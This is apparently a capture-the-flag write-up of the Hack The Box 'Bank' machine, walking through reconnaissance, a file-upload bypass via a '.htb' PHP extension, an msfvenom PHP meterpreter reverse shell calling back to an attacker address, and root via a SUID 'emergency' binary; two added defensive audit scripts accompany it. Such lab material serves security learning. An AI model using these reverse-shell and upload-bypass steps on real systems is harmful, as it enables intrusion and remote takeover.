hackthebox – Bank

nmap

nmap -sS -sV -p- -oN bank.txt 10.10.10.29

The result is as follows:

Nmap scan report for 10.10.10.29
Host is up (0.0049s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Dec  4 12:31:15 2020 -- 1 IP address (1 host up) scanned in 18.56 seconds

Looking for clues to the foothold

Browsing to the IP address only shows the default Apache page.

The nmap result shows a DNS port. Guessing that the hostname is bank.htb, I verified with nslookup that bank.htb is the FQDN of 10.10.10.29.

The result of nslookup

On my own attacker’s machine I just need to add the hostname to my /etc/hosts.

Browsing to http://bank.htb presents a login page.

The actual page of bank.htb.

Using dirbuster with 50 threads, /balance-transfer was found after some time.

The directory listing takes quite some time.

Browsing /balance-transfer shows a list of files. Each file is 583 or 584 bytes, except for one file of 257 bytes.

The only file that has much smaller file size than the rest.
The login portal username and password found.

Get the foothold

This is the transaction portal of chris

On the support page, I inspected the “Choose file…” element and found an interesting comment saying that htb can be used as the file extension for PHP.

The comment suggests htb can be used for php.
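The weakness here is a web server that executes a second, non-obvious extension as PHP, so an upload filter that only blocks .php is bypassed. With mod_php that mapping lives in an AddType or AddHandler directive. The following script, added here as an illustration and not part of the original post or of the Bank machine's real configuration, audits Apache configuration text for every extension bound to a PHP handler and reports the ones beyond the expected .php. The sample configuration strings are constructed; the .htb mapping in the weak sample mirrors what the comment on the support page implies.

```python
import re
from typing import Dict, List

# Handler names / MIME types that make mod_php execute a file as PHP.
PHP_HANDLER_MARKERS = ("application/x-httpd-php", "php-script",
                       "php5-script", "php7-script", "php8-script")

# Extensions an application is normally expected to execute as PHP.
EXPECTED_PHP_EXTENSIONS = {".php"}

_DIRECTIVE_RE = re.compile(r"^(AddType|AddHandler)\s+(\S+)\s+(.+?)\s*$",
                           re.IGNORECASE)


def php_extensions(config_text: str) -> Dict[str, str]:
    """Map each extension that AddType/AddHandler binds to a PHP handler
    to the directive line that bound it. Comment and blank lines are skipped."""
    bound: Dict[str, str] = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _DIRECTIVE_RE.match(line)
        if not m:
            continue
        handler = m.group(2).lower()
        if not any(marker in handler for marker in PHP_HANDLER_MARKERS):
            continue
        for ext in m.group(3).split():
            ext = ext.lower()
            if not ext.startswith("."):
                ext = "." + ext
            bound[ext] = line
    return bound


def unexpected_php_extensions(config_text: str) -> List[str]:
    """Extensions executed as PHP that are not in EXPECTED_PHP_EXTENSIONS."""
    return sorted(ext for ext in php_extensions(config_text)
                  if ext not in EXPECTED_PHP_EXTENSIONS)


# Constructed sample configurations (assumptions, not the Bank box's config).
SAMPLE_WEAK = """
# PHP handler mapping with an extra, non-obvious extension
AddType application/x-httpd-php .php .htb
AddHandler application/x-httpd-php .phtml
AddType text/html .shtml
"""

SAMPLE_HARDENED = """
# Only the canonical extension is executed as PHP
AddType application/x-httpd-php .php
"""

if __name__ == "__main__":
    print("weak config executes as PHP:", unexpected_php_extensions(SAMPLE_WEAK))
    print("hardened config executes as PHP:", unexpected_php_extensions(SAMPLE_HARDENED))
```

Running this against the weak sample reports .htb and .phtml as unexpected executable extensions, and nothing for the hardened sample. Extension hygiene alone is not enough for an upload feature: the upload directory should also sit outside the DocumentRoot or have PHP execution disabled for it, so that an uploaded file is never reachable as executable content.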

My next step is to generate a PHP file named bank.htb and upload it by submitting a support ticket.

I can use pentestmonkey’s PHP reverse shell script or generate one with msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f raw > bank.htb

Before uploading bank.htb, I set up a Metasploit multi/handler to listen for the connection.

Set up the multi handler and wait for the connection.
Upload successful.
To execute the php I simply click on the “Click Here” link.
Meterpreter got a connection.

Upgrade to a partially interactive shell

python3 -c "import pty;pty.spawn('/bin/sh')"
Upgrading the non-interactive shell to a partially interactive one.

Get the user flag

The user.txt file in /home/chris is world-readable (mode 444), so anyone can read it.

Obtained the user flag

Get root

find / -perm -u=s -type f 2>/dev/null

The result includes one unusual file that looks interesting.

/var/htb/bin/emergency looked interesting

This emergency program has the SUID bit set, which means it runs with the privileges of the file’s owner, and the owner is root. I was not sure what it does, but one directory up there is a python2 script with the same name.

So the emergency program is for escalating to root

So it is clear that emergency is a privesc tool. I can either run the script or run emergency directly; both work the same.

Privesc by running the program
Run the python2 script which is a wrapper for the emergency program

Reference: SUID risk

To understand the risk of SUID binaries, click here.
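The same find command that surfaced /var/htb/bin/emergency is how a defender catches a stray SUID root binary before it is used. The script below, added here as an illustration and not part of the original post, collects SUID regular files the way `find / -perm -u=s -type f` does and flags two things: files outside the directories where SUID binaries normally live, and files not present in a previously recorded baseline. The baseline and current lists are constructed sample data; the only path taken from this writeup is /var/htb/bin/emergency, and the expected-directory list is an assumption for a Debian/Ubuntu host.

```python
import os
import stat
from typing import Iterable, List

# Directories where SUID binaries are normally expected on Debian/Ubuntu
# (assumption; adjust to the host's own baseline).
EXPECTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                      "/usr/lib/", "/usr/libexec/")

# Pseudo-filesystems that never hold real binaries and are skipped.
SKIP_DIRS = ("/proc", "/sys", "/dev")


def scan_suid(root: str = "/") -> List[str]:
    """Return regular files under root with the SUID bit set, sorted,
    the same set that `find / -perm -u=s -type f` reports."""
    found: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def outside_expected_dirs(paths: Iterable[str]) -> List[str]:
    """SUID files living somewhere other than the expected system directories."""
    return sorted(p for p in paths if not p.startswith(EXPECTED_SUID_DIRS))


def new_since_baseline(current: Iterable[str], baseline: Iterable[str]) -> List[str]:
    """SUID files present now that were absent from the recorded baseline."""
    return sorted(set(current) - set(baseline))


# Constructed sample data standing in for a saved baseline and a fresh scan.
BASELINE = ["/bin/su", "/usr/bin/passwd", "/usr/bin/sudo",
            "/usr/lib/openssh/ssh-keysign"]
CURRENT = BASELINE + ["/var/htb/bin/emergency"]

if __name__ == "__main__":
    # Live scan of this host; on a real host compare against a stored baseline.
    live = scan_suid("/")
    print("SUID files outside expected dirs:", outside_expected_dirs(live))
    print("sample: new since baseline:", new_since_baseline(CURRENT, BASELINE))
```

On the sample data both checks single out /var/htb/bin/emergency: it sits under /var rather than a system binary directory, and it was not in the baseline. The baseline comparison is the more reliable signal, since a packaged SUID helper can legitimately live under /usr/lib, while a new SUID file appearing anywhere after the baseline was taken deserves a look.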
